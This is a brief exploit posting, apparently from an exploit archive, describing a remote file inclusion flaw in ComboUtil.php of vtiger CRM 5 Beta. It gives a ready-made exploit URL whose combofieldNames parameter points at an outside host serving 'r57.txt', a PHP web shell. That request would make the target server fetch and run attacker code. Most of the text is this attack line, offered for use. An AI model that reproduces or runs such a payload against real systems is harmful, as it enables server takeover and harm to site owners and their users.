Title : vtiger CRM 5 Beta Remote File Include Vulnerability
#Author: Crackers_Child
#cont@ct: [email protected]
Bug in ComboUtil.php
require_once('include/database/PearDatabase.php');
function getComboArray($combofieldNames)
Exploit:
http://www.site.com/vtiger_path/include/ComboUtil.php?combofieldNames=http://siberaktif.net/r57.txt
?